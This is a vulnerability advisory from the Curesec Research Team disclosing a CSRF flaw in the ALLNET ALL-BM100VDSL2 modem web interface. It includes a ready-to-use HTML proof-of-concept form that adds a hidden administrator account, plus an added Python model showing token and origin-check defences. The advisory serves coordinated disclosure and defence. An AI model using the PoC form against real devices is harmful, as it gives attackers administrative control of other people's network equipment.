VDSL Client Modem ALL-BM100VDSL2: CSRF

Date: 2017-04-13 14:09:15
Security Advisory – Curesec Research Team

1. Introduction

Affected Product: VDSL Client Modem ALL-BM100VDSL2 C.4.6a
Fixed in: C.4.8a
Fixed Version Link: http://www.allnet.de/nc/de/allnet-brand/support/treiber-firmware/download/120183/
Vendor Website: http://www.allnet.de/
Vulnerability Type: CSRF
Remote Exploitable: Yes
Reported to vendor: 12/20/2016
Disclosed to public: 04/13/2017
Release mode: Coordinated Release
CVE: n/a (not requested)
Credits: Tim Coen & Marcus Gruber of Curesec GmbH

2. Overview

The web interface of the VDSL Client Modem ALL-BM100VDSL2 is vulnerable to CSRF.

3. Details

CSRF

CVSS: High 8.8 CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

Description: The web interface does not have any CSRF protection: state-changing requests are accepted without an anti-CSRF token. An attacker who gets a logged-in administrator to open a page hosting the form below can, for example, add a new admin user (admin2 / admin) with local, remote, FTP and SMB access. The form's action must point at the modem's management address.

Proof of Concept:

<html>
  <body>
    <form action="" method="POST">
      <input type="hidden" name="page" value="system_password.htm" />
      <input type="hidden" name="curr_user_id" value="1" />
      <input type="hidden" name="submitflag" value="1" />
      <input type="hidden" name="users" value="<New User>" />
      <input type="hidden" name="userEnable" value="1" />
      <input type="hidden" name="userNew" value="admin2" />
      <input type="hidden" name="user_passwd_edit_enable" value="1" />
      <input type="hidden" name="userNewPswd" value="admin" />
      <input type="hidden" name="userConPswd" value="admin" />
      <input type="hidden" name="userLaccess" value="1" />
      <input type="hidden" name="userRaccess" value="1" />
      <input type="hidden" name="userFTPaccess" value="1" />
      <input type="hidden" name="userSMBaccess" value="1" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
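The following Python model is an added example, not code from Curesec or from the ALL-BM100VDSL2 firmware. It replays the PoC's field names against a handler modelled on the described behaviour (any authenticated session may add a user) and against the same handler placed behind two standard CSRF defences: a per-session synchronizer token compared in constant time, and an Origin/Referer check. The device address 192.168.1.1 and the attacker origin are assumptions; the user store is an in-memory dict.

```python
import hmac
import secrets
from urllib.parse import urlparse

# Constructed sample input: the fields the advisory's PoC form submits.
POC_FORM = {
    "page": "system_password.htm",
    "curr_user_id": "1",
    "submitflag": "1",
    "users": "<New User>",
    "userEnable": "1",
    "userNew": "admin2",
    "user_passwd_edit_enable": "1",
    "userNewPswd": "admin",
    "userConPswd": "admin",
    "userLaccess": "1",
    "userRaccess": "1",
    "userFTPaccess": "1",
    "userSMBaccess": "1",
}

# Hypothetical management address; the advisory does not give the real one.
DEVICE_ORIGIN = "http://192.168.1.1"


def add_user_unprotected(session, form, users):
    """Model of the unpatched handler: a valid session cookie plus the right
    field names is all it checks, so a cross-site POST succeeds."""
    if not session.get("authenticated"):
        return "login required"
    if form.get("page") != "system_password.htm" or form.get("submitflag") != "1":
        return "ignored"
    if form.get("userNewPswd") != form.get("userConPswd"):
        return "password mismatch"
    users[form["userNew"]] = {
        "password": form["userNewPswd"],
        "local": form.get("userLaccess") == "1",
        "remote": form.get("userRaccess") == "1",
        "ftp": form.get("userFTPaccess") == "1",
        "smb": form.get("userSMBaccess") == "1",
    }
    return "created"


def issue_csrf_token(session):
    """Synchronizer token: unguessable, bound to the session, embedded as a
    hidden field in the real form. A cross-site page cannot read it."""
    token = secrets.token_hex(32)
    session["csrf_token"] = token
    return token


def origin_allowed(headers, expected_origin):
    """Defence in depth: the browser sets Origin/Referer and a cross-site page
    cannot forge them. If both are absent, fail closed."""
    origin = headers.get("Origin")
    if origin is None:
        referer = headers.get("Referer")
        if referer is None:
            return False
        parsed = urlparse(referer)
        origin = f"{parsed.scheme}://{parsed.netloc}"
    return origin == expected_origin


def add_user_protected(session, headers, form, users, expected_origin=DEVICE_ORIGIN):
    """The same handler behind an origin check and a constant-time token check."""
    if not session.get("authenticated"):
        return "login required"
    if not origin_allowed(headers, expected_origin):
        return "rejected: bad origin"
    expected = session.get("csrf_token")
    supplied = form.get("csrf_token", "")
    if not expected or not hmac.compare_digest(expected.encode(), supplied.encode()):
        return "rejected: bad csrf token"
    return add_user_unprotected(session, form, users)


def demo():
    """Replays the PoC against both handlers. The session counts as
    authenticated because the victim's browser attaches the login cookie."""
    session = {"authenticated": True}
    attacker_headers = {"Origin": "http://attacker.example"}  # hypothetical
    r_unprotected = add_user_unprotected(session, POC_FORM, {})
    r_cross_site = add_user_protected(session, attacker_headers, POC_FORM, {})
    # Same origin but no token: still rejected, the token is the primary check.
    r_no_token = add_user_protected(session, {"Origin": DEVICE_ORIGIN}, POC_FORM, {})
    # Legitimate submission from the device's own page carrying the token.
    token = issue_csrf_token(session)
    legit_form = dict(POC_FORM, csrf_token=token)
    users = {}
    r_legit = add_user_protected(session, {"Origin": DEVICE_ORIGIN}, legit_form, users)
    return r_unprotected, r_cross_site, r_no_token, r_legit, users


if __name__ == "__main__":
    print(demo())
```

The token check is the load-bearing control; the origin check only adds margin, since some clients strip Referer and older browsers omit Origin on form posts, which is why a missing header fails closed rather than open. On a device that is only ever reached from a browser, a SameSite cookie attribute on the session cookie is a third, cheap layer.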

4. Solution

To mitigate this issue please upgrade at least to version C.4.8a:

http://www.allnet.de/nc/de/allnet-brand/support/treiber-firmware/download/120183/

Please note that a newer version might already be available.

5. Report Timeline

12/20/2016 Informed Vendor about Issue
12/23/2016 Vendor announces release of new firmware
02/15/2017 Reminded Vendor about disclosure date
03/01/2017 Vendor releases new Version
04/13/2017 Disclosed to public